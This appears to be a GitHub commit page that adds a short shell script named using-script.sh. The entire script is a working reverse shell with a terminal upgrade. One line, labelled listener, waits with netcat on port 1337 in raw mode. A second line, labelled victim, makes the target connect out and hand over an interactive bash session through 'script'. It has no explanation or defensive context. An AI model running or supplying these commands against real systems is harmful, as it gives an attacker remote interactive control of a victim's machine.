Create using-script.sh

This commit is contained in:
dade 2017-07-20 19:24:25 -07:00 committed by GitHub
parent 49835eed58
commit 590fcc5bad

View File

@ -0,0 +1,5 @@
# Listener
stty -echo raw ; nc -lp 1337; stty sane
# Victim
nc -c '/bin/bash -c "script /dev/null"' listener 1337